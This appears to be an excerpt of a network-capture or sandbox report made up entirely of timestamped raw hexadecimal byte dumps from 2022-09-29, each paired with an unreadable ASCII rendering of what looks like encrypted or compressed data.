                                                                                                                                                    2022-09-29 12:59:21 UTC29890INData Raw: 8e 7d 2f eb 2f 38 fe f1 06 4f 14 4f f8 16 6f f0 bf fe d9 4b a4 c6 e9 af ae 1d 16 fd ba 37 61 18 b2 f8 1f 86 60 c3 5f e3 c6 07 d3 bd 3c 38 eb c6 c7 ac b7 4a c8 c3 5f a2 61 e9 58 30 b1 15 75 34 84 f5 34 0b 4d fa 3b 54 a7 45 e1 51 1d 71 10 a7 6a 4a 8e 31 83 08 2a a4 97 9e 09 52 80 d0 10 8e 92 68 4d 98 f0 4e a3 92 95 74 f4 a6 05 6e 0c 1b 2b 7d e2 71 a2 6c ca 68 86 1b 72 e4 9c d2 56 53 04 d8 41 f7 3a a9 bc 91 b5 89 99 3d 9b 63 59 36 86 06 67 5d 23 3a cd 88 85 af 7c ce 4e f6 ac 75 c9 58 c3 b6 ac 38 e6 3d 22 47 2e bd 8e 9d d0 2f a0 3f 00 ef ad 1f 8c 87 d6 8a 63 1b 69 80 4c 71 ed fe a3 bb f7 4e 5f 4b 8e 14 23 77 44 f6 90 2a 6a 76 24 ae 52 eb 75 b1 2c 79 b7 31 84 bf a6 ad 26 75 a5 bb d1 ba e8 2e bf 73 1b e7 ce 67 df 32 c2 19 7d 84 33 59 93 a4 85 e4 b9 88 e1 ff 65
                                                                                                                                                    Data Ascii: }//8OOoK7a`_<8J_aX0u44M;TEQqjJ1*RhMNtn+}qlhrVSA:=cY6g]#:|NuX8="G./?ciLqN_K#wD*jv$Ru,y1&u.sg2}3Ye
                                                                                                                                                    2022-09-29 12:59:21 UTC29906INData Raw: f1 d5 59 81 d4 99 65 39 75 44 c8 d5 1d b2 0f 71 ba 1e 1b 0b e0 49 6a a4 16 35 47 53 62 62 df da 33 1a ae 07 fd 1b b2 58 86 dc ca 2b 17 ca 1c 19 e9 eb 26 a2 86 36 e3 96 2e 74 62 0d 94 87 0d 82 4d b1 c2 bb 74 df 29 cd 7c b7 28 bd 93 08 73 31 7f 34 92 be 94 38 99 17 f4 02 6b d6 9f cc b8 73 60 03 15 f1 46 17 57 b0 1f 91 0e 3b eb c7 bb ad 41 b4 b4 57 e3 3e 71 bc 4b 00 e0 df 87 57 16 61 25 c2 a1 ba 21 11 18 b2 94 78 5c 56 fb 51 20 e3 45 cb 57 c5 7b 51 a9 77 97 60 a1 a9 36 52 4e 10 f4 ce 26 9b 2a ca 87 2f 1e a3 0b 23 39 2b e8 cf 65 27 21 53 99 a6 55 77 c8 c5 f9 8e 9a af 2a b1 3e ef 07 40 8f 85 fd fa 30 e8 0e 5d 6f d9 72 57 d6 54 e7 6f 49 d0 70 d7 ba 9e a2 23 4b 78 23 e3 f4 20 e0 2c 81 89 5c 38 bb 41 fb fd 60 2c b7 17 fb 9e 67 38 86 24 cf 07 b0 12 f2 3d 4b a7 d2
                                                                                                                                                    Data Ascii: Ye9uDqIj5GSbb3X+&6.tbMt)|(s148ks`FW;AW>qKWa%!x\VQ EW{Qw`6RN&*/#9+e'!SUw*>@0]orWToIp#Kx# ,\8A`,g8$=K
                                                                                                                                                    2022-09-29 12:59:21 UTC29922INData Raw: d1 fe 28 2d f8 de 28 1d 05 f8 fb b9 a9 2a 8f 0f 66 25 19 bb 25 fb fd 32 5c d4 d7 99 61 1b 33 cb 3e 5c 24 5f 42 71 16 10 19 eb 9f c1 9e 06 22 1d 80 e3 fc 76 12 91 b5 8f e1 ce 31 e7 53 6d 07 e2 f2 1c 1f a9 a7 f5 68 e0 b7 cd cd df ff 53 fe d3 0c 5b c6 71 07 9c 6a 4a dc de 76 7d 2f 5e 3a ea 17 26 35 9d 0a 7d d9 e6 78 83 a9 ec ff 42 f4 22 33 0a c4 f2 19 f9 15 ad 12 4f 86 d0 43 b2 a3 ed 54 61 38 98 50 dd 91 4f 79 7f 3a ec 47 79 d6 97 1a 8e 10 69 eb d9 db 1a 0b 0e 93 cd f3 df ed 7c 46 1d d4 3a ff e6 b7 82 4d eb 0d 72 26 6c e7 1f 70 c1 3f d7 33 51 7c 8f 43 78 87 f8 49 f4 75 95 68 db b2 d7 95 8a 2e 14 18 35 88 1f 3e 9b 50 ac 34 01 50 ad 6e e1 26 ab 52 93 35 45 2f b6 77 87 4c b7 07 98 b8 33 d6 42 27 58 0d e4 87 94 34 8b a2 10 21 c4 7b 9e c2 5e 73 00 3d 19 1d 89 1f
                                                                                                                                                    Data Ascii: (-(*f%%2\a3>\$_Bq"v1SmhS[qjJv}/^:&5}xB"3OCTa8POy:Gyi|F:Mr&lp?3Q|CxIuh.5>P4Pn&R5E/wL3B'X4!{^s=
                                                                                                                                                    2022-09-29 12:59:21 UTC29938INData Raw: 3c 8f 39 b3 bf 2a 00 ec eb b7 c2 95 f5 0b d8 76 9e 69 91 51 61 ce d2 37 79 4c 53 bd bd 5c 55 d9 ac e5 24 6a a4 4b 3c 35 59 55 77 17 f9 d8 3a 0c 71 65 c3 32 82 f3 22 71 5f 0d b5 7f b7 48 f6 8b 52 bc 31 89 4c 3f d0 7b ec a6 2a 4a 78 b3 27 54 f1 3e 3b 5e e2 53 0f c9 7c c5 7d 88 c1 44 40 f3 ad 06 8b 87 ed 5a fb 0a 22 ef db c4 b9 8a 6d d4 b6 53 48 35 7e f8 9d 2f 5e 71 84 89 a2 94 1f c6 d9 82 a7 55 12 7c 62 b3 ce 79 06 0a ed 9d b2 4d 7a be 7b d3 e6 4a 5c 79 54 f1 06 48 cd 33 78 26 b1 c3 1b 23 5a 3e 32 e4 cc 23 a9 05 e0 e5 d8 46 7e 0c dd a7 fc 11 21 73 ff 5a a9 32 bc 3f bf 32 6f d9 5c e5 00 41 c2 ce 4b 9b 0b f9 71 94 0a d4 7a a9 f7 85 48 92 2d a5 4f af 7d 73 e9 6e 47 71 0e 8b 62 17 07 20 23 5a 94 76 72 82 d2 62 19 82 a5 41 ef 2e 97 ec af d2 32 b3 95 71 cf 92 07
                                                                                                                                                    Data Ascii: <9*viQa7yLS\U$jK<5YUw:qe2"q_HR1L?{*Jx'T>;^S|}D@Z"mSH5~/^qU|byMz{J\yTH3x&#Z>2#F~!sZ2?2o\AKqzH-O}snGqb #ZvrbA.2q
                                                                                                                                                    2022-09-29 12:59:21 UTC29954INData Raw: 04 9d c2 a6 02 2f 04 ea f8 c6 d5 20 f0 f6 88 22 1a b4 a8 4f e4 c9 ed 12 8a d7 80 fe a6 a5 8b f8 96 ba 4c 2c 31 a7 ba a5 68 58 9e 74 ff d4 6d 36 90 bf 0e dc 1a 97 f8 3c e3 cd cc 96 a3 f0 04 3c db 67 d1 80 b5 68 85 51 26 77 f3 88 d3 3c 0b fd b4 55 83 0a 57 71 a8 f6 09 e4 72 56 f2 af 04 e5 8f a2 32 49 c3 df d0 20 db a6 4b bb fb 03 3d 37 4c c5 fd a3 e4 67 5b 1d 05 bf a5 40 90 ef 3c 92 46 de be dd e1 04 e5 10 6d fc 69 84 fa 9b 65 8d ad e7 44 2d be 76 f1 f3 2c e6 5b 57 ac 32 40 98 e6 1f 68 d7 ea 20 57 83 32 d8 ef 98 24 1e 93 e3 b9 22 1d 8c 02 87 23 fa 0a f5 11 a7 72 fa 7c 45 f3 17 bc d4 8d 6e 59 e3 d2 f4 51 39 3a 01 45 b3 6a cb e0 5d da e6 45 37 8b 03 d0 5c 4d 4c 03 79 1a 7f 0f 66 cb dd 86 60 66 1c b5 a6 20 ef 92 3b ed 22 18 1b 74 70 19 7e 38 01 82 ad 4a ed 2e
                                                                                                                                                    Data Ascii: / "OL,1hXtm6<<ghQ&w<UWqrV2I K=7Lg[@<FmieD-v,[W2@h W2$"#r|EnYQ9:Ej]E7\MLyf`f ;"tp~8J.
                                                                                                                                                    2022-09-29 12:59:21 UTC29970INData Raw: 00 55 5d c5 56 b0 f6 81 ae 2c 69 9e 0b 4d 8a b6 ee e3 b7 3b 65 6e 5d d4 86 c0 52 3d f1 25 6a d3 fa 78 ac 2c 7c d4 69 78 ec ba 9e 65 1e f4 c3 dc 45 53 04 c7 e7 86 3a e0 75 ac 57 3f 4b 9b 9c 16 19 e0 a4 a0 ea 34 e1 19 7c cf 83 c0 75 62 e5 73 ae 37 ca 4d 06 ae 5d 94 6b e0 e9 11 62 a1 3d 11 08 3c 41 68 dc 7a 9f 59 7c b0 74 82 d0 89 78 40 62 14 5f b2 91 46 d4 9d 56 66 61 3b a9 06 f2 b3 95 38 e5 e7 5e 65 e8 26 a3 17 34 c7 fd af c8 61 a5 46 46 ff f7 66 e7 df 54 25 af 6c 9e ee f8 80 d9 5d bd f4 7b aa c6 6a 41 40 79 46 0d e7 c6 97 9b 82 10 26 bf 13 60 32 6b 28 55 5e 8c db a2 aa 24 11 ed 01 ff 5c 30 a0 43 48 39 c8 45 f4 ee 5d 23 fe 21 88 7e c3 ed 4e 33 bf 83 ad 4a 10 0d ad 2e 9c f2 ff ae fe c7 b9 dc 00 15 36 db 74 9a e2 b9 c3 3f ac 22 71 b7 79 cd 31 3d e1 16 13 bf
                                                                                                                                                    Data Ascii: U]V,iM;en]R=%jx,|ixeES:uW?K4|ubs7M]kb=<AhzY|tx@b_FVfa;8^e&4aFFfT%l]{jA@yF&`2k(U^$\0CH9E]#!~N3J.6t?"qy1=
                                                                                                                                                    2022-09-29 12:59:21 UTC29986INData Raw: f5 43 77 0d 36 48 d5 96 80 4b fa 48 b3 a5 76 3c 86 a3 6e 44 fe 17 22 81 83 7c 59 45 4d 39 e6 39 51 a3 4e 77 37 20 e8 bc 96 8f 50 48 02 0a c6 49 b9 5f cb a9 e8 7c 5d ac 51 0f 75 c3 e7 68 b8 1c 6c e1 4c e5 d1 5d 42 20 da a2 e3 ba 1c 4b a7 6d c7 09 47 71 d4 12 12 8a 7b 76 f7 a7 9b e9 07 14 99 d4 a1 8f b3 40 ef 0b 6b 67 81 74 a1 1e 0c f4 53 15 aa 8e 60 09 69 ae a0 ff fa 00 e7 65 21 7e 47 57 37 64 76 0c 46 b7 f9 1b ce 27 6c 05 f0 06 23 c7 f1 ce 67 d9 02 f4 64 8e e8 f2 30 a2 6c 8a b1 13 67 dc d4 5f 23 07 e9 e0 f4 e6 82 69 cd 1f 38 65 df 38 29 07 cf b5 c8 2f e4 2e 64 96 92 4d f9 ff 20 04 01 59 8a 01 4b 69 64 3d 60 88 16 25 b1 a1 66 6d 4b dc b2 25 cc 0e 7a 04 ff 21 fd 32 c9 d4 7d 74 07 26 89 6d 89 56 fc 43 54 94 d7 5d 79 c9 b3 84 97 d7 a6 d9 d3 0d f2 51 20 e6 12
                                                                                                                                                    Data Ascii: Cw6HKHv<nD"|YEM99QNw7 PHI_|]QuhlL]B KmGq{v@kgtS`ie!~GW7dvF'l#gd0lg_#i8e8)/.dM YKid=`%fmK%z!2}t&mVCT]yQ
                                                                                                                                                    2022-09-29 12:59:21 UTC30002INData Raw: c7 9a d1 45 7c 6d cc 86 ec 63 f0 f1 fd ca bd 5e 54 1c 6b 6e 51 d0 f3 cd 25 56 56 9f 4d 13 6b 3e 15 d7 5c 1f 54 c5 98 b3 6c 57 92 0c 24 8c a3 7f 31 8a 61 77 d1 94 f4 91 3e ba 05 f7 51 aa 03 58 4f ee d0 50 59 96 89 90 5c ad 43 19 ca e4 00 c0 ca a0 b2 b9 5f 3f 3a 01 ea 65 48 6b f7 cb 4a 9d 11 89 7a 0b 76 5e 3a 46 c3 c0 56 94 f6 61 e1 2a 38 5c 11 47 a1 14 bc c8 ae 95 bc 8d 5c 88 46 ae cc 08 77 d3 3a 6b 48 c6 67 3e ec f3 65 86 5d 33 f1 2c 10 a5 ec bd 54 fd 75 9c d4 4a 1f f3 08 1e ae 66 d3 0a 1f 23 b1 c1 55 e4 89 8d 4d 7b e7 25 37 67 75 38 ef dc 46 f3 d2 64 fc 73 4a b6 09 ea 30 c0 35 b7 50 64 16 29 c9 fa f0 fb 7b 03 44 51 10 e3 48 bf 44 14 90 21 b2 7c 36 e5 63 82 e3 1d 96 93 df c5 8c 56 79 10 64 6f 88 00 ba 5e 58 e5 66 82 00 41 65 ff dd 2f 57 57 c2 98 ae 57 65
                                                                                                                                                    Data Ascii: E|mc^TknQ%VVMk>\TlW$1aw>QXOPY\C_?:eHkJzv^:FVa*8\G\Fw:kHg>e]3,TuJf#UM{%7gu8FdsJ05Pd){DQHD!|6cVydo^XfAe/WWWe
                                                                                                                                                    2022-09-29 12:59:21 UTC30018INData Raw: 61 de e4 e5 d2 54 4b bf a8 1e c2 cd 38 00 dd ff d1 13 d3 4c 35 d5 4c 07 32 1a b3 9d a7 68 bd af 97 15 ec f1 7c 15 5d 3c 7c e9 b8 eb 67 a1 0b 36 63 00 1f 49 56 eb 24 95 db 09 9d 27 64 3c 3e 9a c9 66 a0 7d 37 9f 08 35 46 99 eb da ea c2 95 19 c7 52 bd 31 5f 07 0d 50 dc 94 e8 49 f0 c0 c1 52 78 ec 00 12 b8 dc c9 68 d6 bd 17 1c 52 95 e4 5f 89 47 bd a0 03 40 c6 bf a8 db d8 90 77 94 4a 05 9d 8d 95 ce 46 9e a2 0e a6 03 07 7c 07 7d 73 70 7e 8c 39 3a 1a 44 a4 9b 74 2e 91 e4 7d 7a 47 3f 3c 0f 0f 17 c1 b8 03 6f 1a ff 4b 9a d3 e3 5d 8b 6d 1c d2 6d 7c ff 2c 51 87 6c 08 1d a3 1a 6c b9 01 87 af 1f 39 d1 e7 7e a9 31 80 75 c5 ce 37 80 7a b8 de b5 df c2 cb 79 ce f1 e9 65 6a c0 a9 e3 4f 9e 68 b2 10 7a ca fb 9b 05 d4 79 91 cf cb c4 f4 f4 a6 69 8c 0c 5f 9e 15 1b d4 13 15 fe 2a
                                                                                                                                                    Data Ascii: aTK8L5L2h|]<|g6cIV$'d<>f}75FR1_PIRxhR_G@wJF|}sp~9:Dt.}zG?<oK]mm|,Qll9~1u7zyejOhzyi_*
                                                                                                                                                    2022-09-29 12:59:21 UTC30034INData Raw: 2e 06 67 92 55 64 91 d3 da 16 8a d0 44 ef 90 8f 9f 8a 55 bf e4 11 ad 00 63 37 d3 ff 7f 5f ba 9f 25 d9 4b ae 29 5d 56 0f 67 d6 6d 1b aa 9f 1d 31 98 91 e4 bd be 34 68 92 48 58 e4 63 a3 32 b8 75 2e d4 46 cc c5 e5 2f d4 ca 02 39 be 33 f4 15 c0 12 dc 19 fd 06 5b 23 4d 22 ed 40 27 8e da 92 d8 62 57 3a b1 c9 84 b9 66 ee d1 20 03 17 ce 68 71 66 88 b4 3b a4 e6 ed e4 d8 f4 af 87 d7 43 b3 29 50 09 83 2c 9d aa b1 d4 ac 35 48 ce 2e 64 59 e2 8b d7 4d 0d ea a4 31 c8 cb 6a 13 d5 ad 76 a0 fa ee 48 24 e9 47 0a 41 0d 81 73 cb 61 2f e9 04 66 96 94 21 e0 2e 95 dd 21 60 da fd e9 8f d8 5b 35 fa 04 43 1e c8 96 78 1e ae af 5f 6e d1 b7 d7 be 8f f9 c1 1a a2 e9 e0 82 1d fb 6a fe 9c 10 7a c3 8b 4c f5 4c ba 85 97 2c 0c a9 a5 c0 8e ef e5 cd 1d 61 69 b7 68 7f d0 93 49 76 e0 58 12 5a 8a
                                                                                                                                                    Data Ascii: .gUdDUc7_%K)]Vgm14hHXc2u.F/93[#M"@'bW:f hqf;C)P,5H.dYM1jvH$GAsa/f!.!`[5Cx_njzLL,aihIvXZ
                                                                                                                                                    2022-09-29 12:59:21 UTC30050INData Raw: 2e d6 31 13 0c f9 d7 51 02 a8 c9 c4 21 c0 fb fb 9b 1d ed eb 98 62 7e 0d bc bc 04 8c d7 89 49 bf c4 59 f7 67 e6 fd f6 ef 4c ae 4e 26 60 63 8f 78 a9 23 05 35 44 d5 f0 72 d3 a1 08 91 bf 02 cd 12 6c 8a 91 26 a2 79 d0 8e e7 6e 16 0c 80 8d fc 02 f5 47 0a ca fe ab a0 42 1d da 96 b4 c9 1a d5 bc 37 45 a3 4a ca cc 3c e4 4d 61 d6 06 48 43 a6 50 08 3e ea bc 3e 14 c8 66 2f a3 6c e9 76 79 b7 e3 7c a2 6f 02 b3 2e 8e e1 3f 57 2c e3 f8 de 6b b9 41 40 ef e5 1f 3d 81 3a 94 9b 9f e2 b7 8a 99 61 d8 1b 88 d0 62 76 6c c1 0a a8 23 0e b8 21 0c 9c 55 c6 fb c3 0d ed b9 2b 57 50 a3 2f ea ac 3a aa 89 56 45 12 41 93 8a 97 52 0b 10 0f 03 93 c3 1c 89 dd a9 42 94 d5 cf 0c ea 54 c7 d1 f1 c5 8a 87 1c fb be 49 ea 6d df fe ae 31 17 6c 6f de 32 75 a9 3b b7 87 60 05 72 e8 5c 33 d6 4c 38 67 e0
                                                                                                                                                    Data Ascii: .1Q!b~IYgLN&`cx#5Drl&ynGB7EJ<MaHCP>>f/lvy|o.?W,kA@=:abvl#!U+WP/:VEARBTIm1lo2u;`r\3L8g
                                                                                                                                                    2022-09-29 12:59:21 UTC30066INData Raw: 5e fd 14 3d da d0 4f 41 d6 3d e5 c9 d3 22 89 e8 52 7e f4 1e ad 67 1d 63 ab fc 30 92 6a a4 61 98 63 85 2e f1 72 2c 97 21 c0 86 46 92 88 d7 76 c9 be 35 bb 44 a4 48 f6 1e 77 4c 9e 0f 56 8b 34 11 6c 97 84 bd 7c bc 3b 09 26 21 26 ca db 55 cb 9c 09 f8 62 9f 3c 71 22 47 63 d3 a2 9c 6f 1e 0c 40 bf 24 13 e0 19 f3 d5 d2 3c 2f aa 08 b1 ce 38 80 71 cd cd 84 71 fd 8a 0c 9b 15 2c aa db 4e 6b 12 09 de 10 85 40 e6 35 42 7e bb 60 ee 98 0c d8 65 60 b6 26 16 5e c9 23 5a f3 17 ac 05 e6 81 5a d9 ce 16 9d b0 27 b5 8c af cb 85 47 e3 33 64 b6 25 15 b8 4e c4 92 d4 07 f8 55 60 fb dc 92 49 de f4 5c 72 e7 60 5f 1a 55 79 36 0f 84 28 4e d1 cc 70 b9 c6 c3 4e 71 15 15 3d 70 c6 4a 64 f0 c8 72 42 f3 05 9c 98 16 26 78 e7 9f d5 ea d2 fc b5 ad e5 c1 14 d1 66 38 d5 8f 93 5d 18 f8 6b 08 d7 76
                                                                                                                                                    Data Ascii: ^=OA="R~gc0jac.r,!Fv5DHwLV4l|;&!&Ub<q"Gco@$</8qq,Nk@5B~`e`&^#ZZ'G3d%NU`I\r`_Uy6(NpNq=pJdrB&xf8]kv
                                                                                                                                                    2022-09-29 12:59:21 UTC30082INData Raw: 90 ea b8 63 de df 7e e2 e5 ce 0c a7 fd d0 82 20 cf d2 be 30 d6 1a 94 43 52 20 1c d7 d4 92 67 ad bc 2c 8b 09 13 61 9c ab 32 d1 40 4c b0 f8 a5 e1 27 58 c3 bf ba b3 8d 64 96 81 22 27 26 9f e2 09 6c 03 b1 64 ca ec db d8 88 e8 94 58 ac 54 b4 d5 84 8e 47 15 58 c8 9e 66 06 20 8d f4 fc 3c 1b 50 b1 71 99 02 47 39 e5 de 85 bd c7 7e a8 46 69 11 76 bc 51 c4 b5 17 64 f6 17 4c 33 91 1e 36 51 c7 be cc 88 58 01 22 53 67 98 a1 d5 f8 1f a6 9d 2e 63 6b 16 b7 a9 c8 12 bf 79 ec c0 ce 8d 6f f5 7c 3b ef a2 f2 91 cb f7 79 db e5 f8 f4 6e 0d a5 70 b1 51 2a d3 2e c3 24 f0 2d 36 dc b6 92 5f 71 9b 6c 03 52 34 bd d4 cd 35 75 3d 1c ed 56 48 88 3a e5 e7 98 3d 97 18 3a 41 bd cb e4 67 39 3a 8e 0f 4c b1 ee 99 06 1d 15 90 f3 be 26 bc 01 82 04 fd 06 d8 a6 53 be ee f6 b9 31 16 d3 c3 9d fa 44
                                                                                                                                                    Data Ascii: c~ 0CR g,a2@L'Xd"'&ldXTGXf <PqG9~FivQdL36QX"Sg.ckyo|;ynpQ*.$-6_qlR45u=VH:=:Ag9:L&S1D
                                                                                                                                                    2022-09-29 12:59:21 UTC30098INData Raw: 99 d4 88 1f 69 f2 4d 9b 51 2f 27 84 ff e9 19 e0 e4 97 c8 2d df 18 d6 8e 3f 2f ca 53 46 60 22 af 6f 4c 71 91 91 df 69 cc eb 03 e2 23 9d e7 47 6c e1 c9 67 8f 2e bf 08 e2 b9 97 82 44 34 77 94 eb 29 30 49 bf e9 ee 62 ff 80 5a 32 15 ae 98 52 49 f8 a4 9e d3 bb 9b da 26 2b 37 72 ba b7 2c cc 67 a4 75 0d 4d e9 c3 6b 6f 2f a7 a8 07 91 d1 8d e6 33 b6 d2 1b f6 00 d1 1d 57 30 92 6e e5 9a c1 29 5e 02 5c 68 76 24 1d f4 c4 bd ce 8d 13 56 78 3d b3 c8 de 07 84 32 c1 d0 07 ef ce 8f 88 44 6e b3 d5 36 5f 2c 9e a0 90 53 60 14 26 13 ee 05 b7 36 5e 7d 7b f2 f4 c6 f1 9c d3 c1 e4 4b b7 96 e1 8b 2a f4 30 18 a9 f7 d1 0d e2 35 29 65 23 0e 79 c1 f2 61 e4 e8 78 9d 45 3f b6 79 2b f3 54 69 a9 c8 24 05 73 64 d0 c8 d4 71 5d 68 f1 87 23 06 4d 4e 9a 12 57 57 44 82 e8 03 1b 6e 93 88 43 ec e2
                                                                                                                                                    Data Ascii: iMQ/'-?/SF`"oLqi#Glg.D4w)0IbZ2RI&+7r,guMko/3W0n)^\hv$Vx=2Dn6_,S`&6^}{K*05)e#yaxE?y+Ti$sdq]h#MNWWDnC
                                                                                                                                                    2022-09-29 12:59:21 UTC30114INData Raw: 63 7d f8 b2 55 b5 18 0a 85 4c 3b be 4f 8d 32 4d 49 e0 a5 e2 1f 8c 14 89 95 8a 13 e5 c6 cc d8 82 69 28 2d 3d 13 80 4b 79 5e 60 49 2f 0b fa 5f af bd b6 c0 94 d3 fc f4 61 23 d5 bc 5a 83 da cb d9 0b c8 84 57 66 7a 32 1c 5d 20 fb e9 f7 62 e8 45 c7 d1 b3 a5 f2 27 1e 50 5b 0c db c6 19 ba c8 20 fa e1 fd fe 93 e6 86 5c 15 87 95 24 04 4b fc 7b 2c 93 1e 12 8a 75 1e 52 8d 4c 09 4c 88 65 54 11 9f 31 83 84 2f 6c 20 77 c6 24 8a 4a 26 d9 2e c7 83 ef 44 19 42 2c 22 98 da 87 93 1d 44 fe 04 84 be 42 25 32 b7 1c 4b 21 57 b1 e9 38 39 c6 f2 b1 ea 07 57 16 5a 87 38 d5 8c 82 c0 e4 9d 4f 70 70 54 df 12 ff 8d e6 4a 57 37 c5 cf d4 ac 81 39 43 1e f9 49 77 a9 36 13 13 70 24 d4 62 03 fe 2e 59 ed 7e 5f ee e4 e8 09 8d ad 44 9a bd a4 e6 03 d4 2f 00 63 f9 f5 17 87 56 97 76 04 1f 39 9b b6
                                                                                                                                                    Data Ascii: c}UL;O2MIi(-=Ky^`I/_a#ZWfz2] bE'P[ \$K{,uRLLeT1/l w$J&.DB,"DB%2K!W89WZ8OppTJW79CIw6p$b.Y~_D/cVv9
                                                                                                                                                    2022-09-29 12:59:21 UTC30130INData Raw: 01 ba 6c 51 60 cb b2 18 b7 d3 06 90 1d b1 41 ac 2c 1d ab 10 be fc 5b 70 ed a7 ce 3a f7 f5 2a 50 72 24 ad 02 99 8f bc aa c2 58 69 35 69 c5 3e 32 4d bc 72 36 67 83 dc 96 67 e5 08 f4 9b 93 55 17 dc 39 c9 b7 46 0c 76 ec 8c cc 28 de 1e fb 3b ec 00 8e 74 c5 e2 cd 8a ee c2 f9 37 55 79 82 ee 6f 74 4c 30 8a e7 d8 c5 d7 89 a5 86 e0 68 90 67 ab e8 35 84 40 f8 4f f4 c9 d3 00 65 e8 e2 79 80 24 d9 ea 35 82 7f 90 1e f5 20 6a a1 54 2d 79 47 22 6e af 29 57 0d 7a 44 5f 50 a9 10 4f 7b 41 6e d8 43 46 fe ff ab a5 28 ed ff 5c 92 93 8b 19 a1 63 12 cf 01 4d ad b6 2b c3 5d a2 0c 2d cf 69 5d 4e 7a c9 c1 75 c6 21 b8 3c 04 27 54 6c 9f 3e f0 a2 33 2f 42 43 1d 31 bf 36 72 e1 15 b7 c4 1b 76 a4 56 b4 a0 39 9e 95 0c 81 5a 7d 19 a0 42 8c be 62 fb 1c c5 0c 5c 27 83 71 28 b8 91 4a 56 05 e1
                                                                                                                                                    Data Ascii: lQ`A,[p:*Pr$Xi5i>2Mr6ggU9Fv(;t7UyotL0hg5@Oey$5 jT-yG"n)WzD_PO{AnCF(\cM+]-i]Nzu!<'Tl>3/BC16rvV9Z}Bb\'q(JV
                                                                                                                                                    2022-09-29 12:59:21 UTC30146INData Raw: 4b d9 c4 83 70 9b 46 70 2a 4f 90 89 58 17 ba 57 d0 04 84 e8 dc 35 80 e9 c4 ac 87 e4 f3 78 28 49 e6 dc 88 ad eb e4 eb 9e 5c 4e ea 78 91 f4 ce 85 a3 18 69 ea 88 49 ef 5a 1d eb c4 2b 41 e7 2f 7c ae 34 75 d4 87 af e7 0b 04 ca 12 ac 77 89 bf 45 37 55 eb d6 20 3f 22 9c cf 5a c9 29 29 52 b1 37 62 31 eb 3a 21 39 43 9a 8d 53 6b c6 6e b3 a0 63 6a c0 11 90 2e 47 97 f1 d6 ce 85 af 67 a7 21 a2 b2 e9 49 bf 4d 91 27 72 ab 64 30 18 07 21 9f 54 fa 43 0b de 53 be 13 d7 bb 42 e0 0c 58 cd fa c3 08 25 00 a6 c3 7b 58 4b 45 01 d1 67 d5 5c 5a a7 bc 9c c8 f7 c7 a7 36 3f 73 b6 f4 c2 c9 ad d2 39 83 84 bb 49 d9 d1 5f 36 89 4d 6e 0e 72 73 42 3c 4f be 6e cc d8 48 a8 97 e8 e1 d7 b5 c6 98 a9 35 9e 31 73 89 ca 15 96 ba 92 ed da dc 60 83 23 da 82 3e a7 60 c4 f3 17 c4 88 9c e3 37 66 fb 03
                                                                                                                                                    Data Ascii: KpFp*OXW5x(I\NxiIZ+A/|4uwE7U ?"Z))R7b1:!9CSkncj.Gg!IM'rd0!TCSBX%{XKEg\Z6?s9I_6MnrsB<OnH51s`#>`7f
                                                                                                                                                    2022-09-29 12:59:21 UTC30162INData Raw: a4 e0 30 a8 e0 89 f8 03 79 3a 0e 8c 68 67 66 8b 93 cd 56 ce 22 30 61 fd 6e 2d 6a 60 1b be ff 07 c3 bf ca dd c3 8c aa c3 95 47 6b 1f 8c c3 56 a0 7d 8b 7c d2 dc 9a 06 1e 23 67 2e 14 f8 35 31 7e 67 42 46 b6 10 98 18 5f 21 68 93 16 65 82 a3 c6 31 a5 ef 70 ad b0 07 bb 18 29 a0 ad 26 43 53 3c 28 4e 20 4b ed 1b f4 d5 4a ef 22 2e 3e e4 51 da 91 78 8d 18 38 2a 42 ff 10 02 08 50 05 2f 6a e9 4d 56 47 d5 ce 38 af 49 9a 4b 43 5e f8 bf c6 21 ab 3f 5a d5 d6 a9 4b a9 24 57 7a 7e 1f e5 23 3c c6 7d b5 c2 9b 3b 4a 3e 17 07 b8 68 f5 e2 b9 f3 02 6b 5e 69 b6 b5 62 81 24 93 b2 4f 63 77 cd f2 72 77 90 7f 68 97 ab 9d 81 64 43 e5 dc 06 ec 8a cf 9f 8f f6 f4 36 49 8d a8 76 ce 45 84 6a 69 07 ab c5 59 03 bb 9a f3 78 81 28 62 15 bb d0 87 64 0b 35 0e 44 b0 71 9b 12 cb ba 0d 89 2e 08 9e
                                                                                                                                                    Data Ascii: 0y:hgfV"0an-j`GkV}|#g.51~gBF_!he1p)&CS<(N KJ".>Qx8*BP/jMVG8IKC^!?ZK$Wz~#<};J>hk^ib$OcwrwhdC6IvEjiYx(bd5Dq.
                                                                                                                                                    2022-09-29 12:59:21 UTC30178INData Raw: e7 5b ca 3d 81 d6 d9 de cf a3 f5 21 ac ce 43 f9 4d 73 78 c2 8d 82 1d 87 8c e3 99 e2 ee 4f f4 d7 22 3b b8 fb 4c e7 22 24 f8 69 53 2a 68 d1 ed 66 c0 e6 3c aa 8f b0 73 16 27 19 b6 e7 28 2b 0f 53 d5 40 33 ed 22 7d 24 a4 08 c2 af 59 66 d1 48 59 8a 98 b4 41 8c 74 d5 94 27 6d 62 ca 55 d8 3c a2 33 5c 65 ca b1 39 8c d2 a5 34 df 25 89 8e dc 30 fb 96 09 9c 06 3d 9e 84 d3 3b d4 60 b0 1f 13 b8 a1 00 f3 1c 7e 29 b9 1d 45 d0 5f 10 7e 3d 55 ce cd d4 58 6e 70 cc e2 9b 19 4f 48 41 25 f2 77 5e 6c 7a 59 17 b7 c6 2b dc 91 f1 f5 4b 87 3b da 8c 63 b3 fd b5 53 a3 97 f2 19 2b 5c f4 3c 5c bc 00 06 fc 4d 80 06 25 1f 53 c0 c5 63 03 30 dc 39 5a 97 dd 79 21 be 8b 12 e0 74 c7 14 f8 6a 0b b6 60 44 7a b2 ca d6 e5 02 d9 08 a8 c3 26 fa 80 62 41 97 07 37 21 f6 9e c9 d6 a0 2b fe a2 e8 2e 90
                                                                                                                                                    Data Ascii: [=!CMsxO";L"$iS*hf<s'(+S@3"}$YfHYAt'mbU<3\e94%0=;`~)E_~=UXnpOHA%w^lzY+K;cS+\<\M%Sc09Zy!tj`Dz&bA7!+.
